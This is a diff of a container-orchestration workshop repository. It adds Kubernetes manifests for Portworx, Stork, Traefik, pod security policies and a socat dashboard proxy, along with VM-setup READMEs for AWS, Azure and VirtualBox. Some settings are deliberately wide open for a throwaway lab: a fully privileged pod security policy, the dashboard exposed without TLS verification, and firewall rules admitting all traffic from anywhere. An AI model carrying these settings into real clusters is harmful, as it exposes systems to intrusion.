  verbs: ["get", "create", "update"]
- apiGroups: [""]
  resources: ["services"]
  verbs: ["get"]
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["*"]
  resources: ["deployments", "deployments/extensions"]
  verbs: ["list", "get", "watch", "patch", "update", "initialize"]
- apiGroups: ["*"]
  resources: ["statefulsets", "statefulsets/extensions"]
  verbs: ["list", "get", "watch", "patch", "update", "initialize"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: stork-role-binding
subjects:
- kind: ServiceAccount
  name: stork-account
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: stork-role
  apiGroup: rbac.authorization.k8s.io
---
kind: Service
apiVersion: v1
metadata:
  name: stork-service
  namespace: kube-system
spec:
  selector:
    name: stork
  ports:
  - protocol: TCP
    port: 8099
    targetPort: 8099
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    scheduler.alpha.kubernetes.io/critical-pod: ""
  labels:
    tier: control-plane
  name: stork
  namespace: kube-system
spec:
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  replicas: 3
  template:
    metadata:
      annotations:
        scheduler.alpha.kubernetes.io/critical-pod: ""
      labels:
        name: stork
        tier: control-plane
    spec:
      containers:
      - command:
        - /stork
        - --driver=pxd
        - --verbose
        - --leader-elect=true
        - --health-monitor-interval=120
        imagePullPolicy: Always
        image: openstorage/stork:1.1.3
        resources:
          requests:
            cpu: '0.1'
        name: stork
      hostPID: false
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: "name"
                operator: In
                values:
                - stork
            topologyKey: "kubernetes.io/hostname"
      serviceAccountName: stork-account
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
  name: stork-snapshot-sc
provisioner: stork-snapshot
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: stork-scheduler-account
  namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: stork-scheduler-role
rules:
- apiGroups: [""]
  resources: ["endpoints"]
  verbs: ["get", "update"]
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch", "update"]
- apiGroups: [""]
  resources: ["endpoints"]
  verbs: ["create"]
- apiGroups: [""]
  resourceNames: ["kube-scheduler"]
  resources: ["endpoints"]
  verbs: ["delete", "get", "patch", "update"]
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["delete", "get", "list", "watch"]
- apiGroups: [""]
  resources: ["bindings", "pods/binding"]
  verbs: ["create"]
- apiGroups: [""]
  resources: ["pods/status"]
  verbs: ["patch", "update"]
- apiGroups: [""]
  resources: ["replicationcontrollers", "services"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["app", "extensions"]
  resources: ["replicasets"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["policy"]
  resources: ["poddisruptionbudgets"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["persistentvolumeclaims", "persistentvolumes"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: stork-scheduler-role-binding
subjects:
- kind: ServiceAccount
  name: stork-scheduler-account
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: stork-scheduler-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1beta1
kind: Deployment
metadata:
  labels:
    component: scheduler
    tier: control-plane
    name: stork-scheduler
  name: stork-scheduler
  namespace: kube-system
spec:
  replicas: 3
  template:
    metadata:
      labels:
        component: scheduler
        tier: control-plane
        name: stork-scheduler
    spec:
      containers:
      - command:
        - /usr/local/bin/kube-scheduler
        - --address=0.0.0.0
        - --leader-elect=true
        - --scheduler-name=stork
        - --policy-configmap=stork-config
        - --policy-configmap-namespace=kube-system
        - --lock-object-name=stork-scheduler
        image: gcr.io/google_containers/kube-scheduler-amd64:v1.11.2
        livenessProbe:
          httpGet:
            path: /healthz
            port: 10251
          initialDelaySeconds: 15
        name: stork-scheduler
        readinessProbe:
          httpGet:
            path: /healthz
            port: 10251
        resources:
          requests:
            cpu: '0.1'
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: "name"
                operator: In
                values:
                - stork-scheduler
            topologyKey: "kubernetes.io/hostname"
      hostPID: false
      serviceAccountName: stork-scheduler-account
---
kind: Service
apiVersion: v1
metadata:
  name: portworx-service
  namespace: kube-system
  labels:
    name: portworx
spec:
  selector:
    name: portworx
  ports:
  - name: px-api
    protocol: TCP
    port: 9001
    targetPort: 9001
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: px-account
  namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: node-get-put-list-role
rules:
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["watch", "get", "update", "list"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["delete", "get", "list"]
- apiGroups: [""]
  resources: ["persistentvolumeclaims", "persistentvolumes"]
  verbs: ["get", "list"]
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list", "update", "create"]
- apiGroups: ["extensions"]
  resources: ["podsecuritypolicies"]
  resourceNames: ["privileged"]
  verbs: ["use"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: node-role-binding
subjects:
- kind: ServiceAccount
  name: px-account
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: node-get-put-list-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Namespace
metadata:
  name: portworx
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: px-role
  namespace: portworx
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "list", "create", "update", "patch"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: px-role-binding
  namespace: portworx
subjects:
- kind: ServiceAccount
  name: px-account
  namespace: kube-system
roleRef:
  kind: Role
  name: px-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: portworx
  namespace: kube-system
  annotations:
    portworx.com/install-source: "https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true"
spec:
  minReadySeconds: 0
  updateStrategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 1
  template:
    metadata:
      labels:
        name: portworx
    spec:
      affinity:
        nodeAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            nodeSelectorTerms:
            - matchExpressions:
              - key: px/enabled
                operator: NotIn
                values:
                - "false"
              - key: node-role.kubernetes.io/master
                operator: DoesNotExist
      hostNetwork: true
      hostPID: false
      containers:
      - name: portworx
        image: portworx/oci-monitor:1.4.2.2
        imagePullPolicy: Always
        args:
          ["-c", "px-workshop", "-s", "/dev/loop4", "-b",
           "-x", "kubernetes"]
        env:
        - name: "PX_TEMPLATE_VERSION"
          value: "v4"

        livenessProbe:
          periodSeconds: 30
          initialDelaySeconds: 840 # allow image pull in slow networks
          httpGet:
            host: 127.0.0.1
            path: /status
            port: 9001
        readinessProbe:
          periodSeconds: 10
          httpGet:
            host: 127.0.0.1
            path: /health
            port: 9015
        terminationMessagePath: "/tmp/px-termination-log"
        securityContext:
          privileged: true
        volumeMounts:
        - name: dockersock
          mountPath: /var/run/docker.sock
        - name: etcpwx
          mountPath: /etc/pwx
        - name: optpwx
          mountPath: /opt/pwx
        - name: proc1nsmount
          mountPath: /host_proc/1/ns
        - name: sysdmount
          mountPath: /etc/systemd/system
        - name: diagsdump
          mountPath: /var/cores
        - name: journalmount1
          mountPath: /var/run/log
          readOnly: true
        - name: journalmount2
          mountPath: /var/log
          readOnly: true
        - name: dbusmount
          mountPath: /var/run/dbus
      restartPolicy: Always
      serviceAccountName: px-account
      volumes:
      - name: dockersock
        hostPath:
          path: /var/run/docker.sock
      - name: etcpwx
        hostPath:
          path: /etc/pwx
      - name: optpwx
        hostPath:
          path: /opt/pwx
      - name: proc1nsmount
        hostPath:
          path: /proc/1/ns
      - name: sysdmount
        hostPath:
          path: /etc/systemd/system
      - name: diagsdump
        hostPath:
          path: /var/cores
      - name: journalmount1
        hostPath:
          path: /var/run/log
      - name: journalmount2
        hostPath:
          path: /var/log
      - name: dbusmount
        hostPath:
          path: /var/run/dbus
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: px-lh-account
  namespace: kube-system
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: px-lh-role
  namespace: kube-system
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "create", "update"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: px-lh-role-binding
  namespace: kube-system
subjects:
- kind: ServiceAccount
  name: px-lh-account
  namespace: kube-system
roleRef:
  kind: Role
  name: px-lh-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Service
metadata:
  name: px-lighthouse
  namespace: kube-system
  labels:
    tier: px-web-console
spec:
  type: NodePort
  ports:
  - name: http
    port: 80
    nodePort: 32678
  - name: https
    port: 443
    nodePort: 32679
  selector:
    tier: px-web-console
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
  name: px-lighthouse
  namespace: kube-system
  labels:
    tier: px-web-console
spec:
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  selector:
    matchLabels:
      tier: px-web-console
  replicas: 1
  template:
    metadata:
      labels:
        tier: px-web-console
    spec:
      initContainers:
      - name: config-init
        image: portworx/lh-config-sync:0.2
        imagePullPolicy: Always
        args:
        - "init"
        volumeMounts:
        - name: config
          mountPath: /config/lh
      containers:
      - name: px-lighthouse
        image: portworx/px-lighthouse:1.5.0
        imagePullPolicy: Always
        ports:
        - containerPort: 80
        - containerPort: 443
        volumeMounts:
        - name: config
          mountPath: /config/lh
      - name: config-sync
        image: portworx/lh-config-sync:0.2
        imagePullPolicy: Always
        args:
        - "sync"
        volumeMounts:
        - name: config
          mountPath: /config/lh
      serviceAccountName: px-lh-account
      volumes:
      - name: config
        emptyDir: {}
k8s/postgres.yaml (Normal file, 30 lines)
@@ -0,0 +1,30 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: postgres
spec:
  selector:
    matchLabels:
      app: postgres
  serviceName: postgres
  template:
    metadata:
      labels:
        app: postgres
    spec:
      schedulerName: stork
      containers:
      - name: postgres
        image: postgres:10.5
        volumeMounts:
        - mountPath: /var/lib/postgresql/data
          name: postgres
  volumeClaimTemplates:
  - metadata:
      name: postgres
    spec:
      accessModes: ["ReadWriteOnce"]
      resources:
        requests:
          storage: 1Gi
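The volumeClaimTemplates block gives each replica its own PersistentVolumeClaim. A sketch of checking the claim behind the first replica:

```bash
kubectl apply -f k8s/postgres.yaml
# StatefulSet PVCs are named <template>-<pod>, i.e. postgres-postgres-0 here:
kubectl get pvc postgres-postgres-0
```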
k8s/psp-privileged.yaml (Normal file, 39 lines)
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
k8s/psp-restricted.yaml (Normal file, 38 lines)
@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
k8s/registry.yaml (Normal file, 15 lines)
@@ -0,0 +1,15 @@
apiVersion: v1
kind: Pod
metadata:
  name: registry
spec:
  containers:
  - name: registry
    image: registry
    env:
    - name: REGISTRY_HTTP_ADDR
      valueFrom:
        configMapKeyRef:
          name: registry
          key: http.addr
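The pod takes its listen address from a ConfigMap named registry (key http.addr) that this diff does not create, so presumably it is created beforehand. A hedged sketch, with 0.0.0.0:5000 as an example value:

```bash
# Hypothetical setup step: the value makes the registry listen on port 5000.
kubectl create configmap registry --from-literal=http.addr=0.0.0.0:5000
kubectl apply -f k8s/registry.yaml
```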
k8s/socat.yaml (Normal file, 67 lines)
@@ -0,0 +1,67 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "2"
  creationTimestamp: null
  generation: 1
  labels:
    app: socat
  name: socat
  namespace: kube-system
  selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
  replicas: 1
  selector:
    matchLabels:
      app: socat
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: socat
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
        image: alpine
        imagePullPolicy: Always
        name: socat
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    app: socat
  name: socat
  namespace: kube-system
  selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
  externalTrafficPolicy: Cluster
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: socat
  sessionAffinity: None
  type: NodePort
status:
  loadBalancer: {}
k8s/storage-class.yaml (Normal file, 11 lines)
@@ -0,0 +1,11 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
  name: portworx-replicated
  annotations:
    storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
  repl: "2"
  priority_io: "high"
k8s/traefik.yaml (Normal file, 100 lines)
@@ -0,0 +1,100 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
  labels:
    k8s-app: traefik-ingress-lb
spec:
  template:
    metadata:
      labels:
        k8s-app: traefik-ingress-lb
        name: traefik-ingress-lb
    spec:
      tolerations:
      - effect: NoSchedule
        operator: Exists
      hostNetwork: true
      serviceAccountName: traefik-ingress-controller
      terminationGracePeriodSeconds: 60
      containers:
      - image: traefik
        name: traefik-ingress-lb
        ports:
        - name: http
          containerPort: 80
          hostPort: 80
        - name: admin
          containerPort: 8080
          hostPort: 8080
        securityContext:
          capabilities:
            drop:
            - ALL
            add:
            - NET_BIND_SERVICE
        args:
        - --api
        - --kubernetes
        - --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
  name: traefik-ingress-service
  namespace: kube-system
spec:
  selector:
    k8s-app: traefik-ingress-lb
  ports:
  - protocol: TCP
    port: 80
    name: web
  - protocol: TCP
    port: 8080
    name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: traefik-ingress-controller
rules:
- apiGroups:
  - ""
  resources:
  - services
  - endpoints
  - secrets
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - extensions
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: traefik-ingress-controller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
  name: traefik-ingress-controller
  namespace: kube-system
k8s/users:jean.doe.yaml (Normal file, 33 lines)
@@ -0,0 +1,33 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
k8s/volumes-for-consul.yaml (Normal file, 70 lines)
@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
netlify.toml (Normal file, 5 lines)
@@ -0,0 +1,5 @@
[build]
base = "slides"
publish = "slides"
command = "./build.sh once"
@@ -13,11 +13,12 @@ Virtualbox, Vagrant and Ansible
 - Virtualbox: https://www.virtualbox.org/wiki/Downloads

 - Vagrant: https://www.vagrantup.com/downloads.html
   - install vagrant-vbguest plugin (https://github.com/dotless-de/vagrant-vbguest)

 - Ansible:
   - install Ansible's prerequisites:

-      $ sudo pip install paramiko PyYAML Jinja2 httplib2 six
+      $ sudo pip install paramiko PyYAML Jinja2 httplib2 six pycrypto

 - clone the Ansible repository and checkout to a stable version
   (don't forget the `--recursive` argument when cloning!):
@@ -31,7 +32,7 @@ Virtualbox, Vagrant and Ansible

       $ source path/to/your-ansible-clone/hacking/env-setup

-  - you need to repeat the last step everytime you open a new terminal session
+  - you need to repeat the last step every time you open a new terminal session
     and want to use any Ansible command (but you'll probably only need to run
     it once).

@@ -93,7 +93,7 @@
         line: "{{ item.private_ip }} {{ item.hostname }}"
         regexp: "^{{ item.private_ip }} {{ item.hostname }}$"
         state: present
-      with_items: instances
+      with_items: "{{ instances }}"

   - name: copying the ssh key to the nodes
     copy:
prepare-machine/README.md (Normal file, 242 lines)
@@ -0,0 +1,242 @@
# Setting up your own cluster
|
||||
If you want to go through this orchestration workshop on your own,
|
||||
you will need a cluster of Docker nodes.
|
||||
|
||||
These instructions will walk you through the required steps,
|
||||
using [Docker Machine](https://docs.docker.com/machine/) to
|
||||
create the nodes.
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
You need Docker Machine. To check if it is installed, try to
|
||||
run the following command:
|
||||
|
||||
```bash
|
||||
$ docker-machine -v
|
||||
docker-machine version 0.8.2, build e18a919
|
||||
```
|
||||
|
||||
If you see a Docker Machine version number, perfect! Otherwise,
|
||||
you need to install it; either as part of the Docker Toolbox,
|
||||
or as a stand-alone tool. See [Docker Machine installation docs](
|
||||
https://docs.docker.com/machine/install-machine/) for details.
|
||||
|
||||
You also need either credentials for a cloud provider, or a
|
||||
local VirtualBox or VMware installation (or anything supported
|
||||
by Docker Machine, really).
|
||||
|
||||
|
||||
## Discrepancies with official environment
|
||||
|
||||
The resulting environment will be slightly different from the
|
||||
one that we provision for people attending the workshop at
|
||||
conferences and similar events, and you will have to adapt a
|
||||
few things.
|
||||
|
||||
We try to list all the differences here.
|
||||
|
||||
|
||||
### User name
|
||||
|
||||
The official environment uses user `docker`. If you use
|
||||
Docker Machine, the user name will probably be different.
|
||||
|
||||
### Node aliases
|
||||
|
||||
In the official environment, aliases are seeded in
|
||||
`/etc/hosts`, allowing you to resolve node IP addresses
|
||||
with the aliases `node1`, `node2`, etc.; if you use
|
||||
Docker Machine, you will have to lookup the IP addresses
|
||||
with the `docker-machine ip nodeX` command instead.
|
||||
|
||||
### SSH keys
|
||||
|
||||
In the official environment, you can log from one node
|
||||
to another with SSH, without having to provide a password,
|
||||
thanks to pre-generated (and pre-copied) SSH keys.
|
||||
If you use Docker Machine, you will have to use
|
||||
`docker-machine ssh` from your machine instead.
|
||||
|
||||
### Machine and Compose
|
||||
|
||||
In the official environment, Docker Machine and Docker
|
||||
Compose are installed on your nodes. If you use Docker
|
||||
Machine you will have to install at least Docker Compose.
|
||||
|
||||
The easiest way to install Compose (verified to work
|
||||
with the EC2 and VirtualBox drivers, and probably others
|
||||
as well) is do use `docker-machine ssh` to connect
|
||||
to your node, then run the following command:
|
||||
|
||||
```bash
|
||||
sudo curl -L \
|
||||
https://github.com/docker/compose/releases/download/1.15.0/docker-compose-`uname -s`-`uname -m` \
|
||||
-o /usr/local/bin/docker-compose
|
||||
sudo chmod +x /usr/local/bin/docker-compose
|
||||
```
|
||||
|
||||
Note that it is not necessary (or even useful) to
|
||||
install Docker Machine on your nodes, since if you're
|
||||
following that guide, you already have Machine on
|
||||
your local computer. ☺
|
||||
|
||||
|
||||
### IP addresses
|
||||
|
||||
In some environments, your nodes will have multiple
|
||||
IP addresses. This is the case with VirtualBox, for
|
||||
instance. At any point in the workshop, if you need
|
||||
a node's IP address, you should use the address
|
||||
given by the `docker-machine ip` command.
|
||||
|
||||
|
||||

## Creating your nodes with Docker Machine

Here are some instructions for various Machine drivers.


### AWS EC2

You have to retrieve your AWS access key and secret access key,
and set the following environment variables:

```bash
export MACHINE_DRIVER=amazonec2
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...
```

Optionally, you can also set `AWS_DEFAULT_REGION` to the region
closest to you. See the [AWS documentation](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-regions)
for the list of available regions and their codes.

For instance, if you are on the US West Coast, I recommend
that you set `AWS_DEFAULT_REGION` to `us-west-2`; if you are
in Europe, to `eu-central-1` (except in the UK and Ireland,
where you probably want `eu-west-1`), etc.

If you don't specify anything, your nodes will be in `us-east-1`.

You can also set `AWS_INSTANCE_TYPE` if you want bigger or smaller
instances than `t2.micro`. For the official workshops, we use
`m3.large`, but remember: the bigger the instance, the more
expensive it gets, obviously!
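
For example, to get `m3.large` instances in Oregon:

```bash
export AWS_DEFAULT_REGION=us-west-2
export AWS_INSTANCE_TYPE=m3.large
```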

After setting these variables, run the following command:

```bash
for N in $(seq 1 5); do
  docker-machine create node$N
  docker-machine ssh node$N sudo usermod -aG docker ubuntu
done
```

And after a few minutes, your five nodes will be ready. To log
into a node, use `docker-machine ssh nodeX`.

By default, Docker Machine places the created nodes in a
security group aptly named `docker-machine`. By default, this
group is pretty restrictive, and will only let you connect
to the Docker API and SSH. For the purpose of the workshop,
you will need to open that security group to normal traffic.
You can do that through the AWS EC2 console, or with the
following CLI command:

```bash
aws ec2 authorize-security-group-ingress --group-name docker-machine --protocol -1 --cidr 0.0.0.0/0
```
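
If you want to double-check the resulting rules, something
like this should work (assuming the AWS CLI is configured
with the same credentials and region):

```bash
aws ec2 describe-security-groups --group-names docker-machine
```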

If Docker Machine fails, complaining that it cannot find
the default VPC or subnet, this could be because you have
an "old" EC2 account (created before the introduction of EC2
VPC) and your account has no default VPC. In that case,
you will have to create a VPC and a subnet in that VPC,
and use the corresponding Machine flags (`--amazonec2-vpc-id`
and `--amazonec2-subnet-id`) or environment variables
(`AWS_VPC_ID` and `AWS_SUBNET_ID`) to tell Machine what to use.

You will get similar error messages if you *have* set these
flags (or environment variables) but the VPC (or subnets)
indicated do not exist. This can happen if you frequently
switch between different EC2 accounts and forget that you
have set `AWS_VPC_ID` or `AWS_SUBNET_ID`.


### Microsoft Azure

You have to retrieve your subscription ID, and set the following environment
variables:

```bash
export MACHINE_DRIVER=azure
export AZURE_SUBSCRIPTION_ID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
```

Additionally, you can set `AZURE_LOCATION` to an Azure datacenter
close to you. By default, it will pick "West US". You can see
the available regions [on Azure's website](
https://azure.microsoft.com/en-us/regions/services/).
For instance, if you want to deploy on the US East Coast,
set `AZURE_LOCATION` to `East US` or `eastus` (capitalization
and spacing shouldn't matter; just use the names shown on the
map or table on Azure's website).
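
For example:

```bash
export AZURE_LOCATION=eastus
```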

Then run the following command:

```bash
for N in $(seq 1 5); do
  docker-machine create node$N
  docker-machine ssh node$N sudo usermod -aG docker docker-user
done
```

The CLI will give you instructions to authenticate on the Azure portal,
and once you've done that, it will create your VMs.

You will log into your nodes with `docker-machine ssh nodeX`.

By default, the firewall only allows access to the Docker API
and SSH ports. To open access to other ports, you can use the
following command:

```bash
for N in $(seq 1 5); do
  az network nsg rule create -g docker-machine --name AllowAny --nsg-name node$N-firewall \
     --access allow --direction inbound --protocol '*' \
     --source-address-prefix '*' --source-port-range '*' \
     --destination-address-prefix '*' --destination-port-range '*'
done
```

(The command takes a while. Be patient.)


### Local VirtualBox or VMware Fusion

If you want to run with local VMs, set the environment variable
`MACHINE_DRIVER` to `virtualbox` or `vmwarefusion` and create your nodes:

```bash
export MACHINE_DRIVER=virtualbox
for N in $(seq 1 5); do
  docker-machine create node$N
done
```


### Terminating instances

When you're done, if you started your instances on a public
cloud (or anywhere where it costs you money!), you will want to
terminate (destroy) them. This can be done with the following
command:

```bash
for N in $(seq 1 5); do
  docker-machine rm -f node$N
done
```
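
You can then confirm that nothing is left behind with:

```bash
docker-machine ls
```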

@@ -2,7 +2,6 @@ FROM debian:jessie
MAINTAINER AJ Bowen <aj@soulshake.net>

RUN apt-get update && apt-get install -y \
    wkhtmltopdf \
    bsdmainutils \
    ca-certificates \
    curl \
@@ -12,19 +11,20 @@ RUN apt-get update && apt-get install -y \
    man \
    pssh \
    python \
    python-pip \
    python-docutils \
    python-pip \
    ssh \
    wkhtmltopdf \
    xvfb \
    --no-install-recommends \
 && rm -rf /var/lib/apt/lists/*

RUN pip install \
    awscli \
    jinja2 \
    pdfkit \
    PyYAML \
    termcolor

WORKDIR $HOME
RUN echo "alias ll='ls -lahF'" >> /root/.bashrc
ENTRYPOINT ["/root/prepare-vms/scripts/trainer-cli"]

RUN mv $(which wkhtmltopdf) $(which wkhtmltopdf).real
COPY lib/wkhtmltopdf /usr/local/bin/wkhtmltopdf

@@ -1,67 +1,197 @@
# Trainer tools to prepare VMs for Docker workshops
# Trainer tools to create and prepare VMs for Docker workshops

## 1. Prerequisites
These tools can help you to create VMs on:

* [Docker](https://docs.docker.com/engine/installation/)
* [Docker Compose](https://docs.docker.com/compose/install/)
- Azure
- EC2
- OpenStack

## 2. Clone the repo
## Prerequisites

    $ git clone https://github.com/jpetazzo/orchestration-workshop.git
    $ cd orchestration-workshop/prepare-vms
- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this

Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).

And if you want to generate printable cards:

- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)

## General Workflow

- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
  (using one of the example files in that directory)
- create your own settings file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and set up the environment
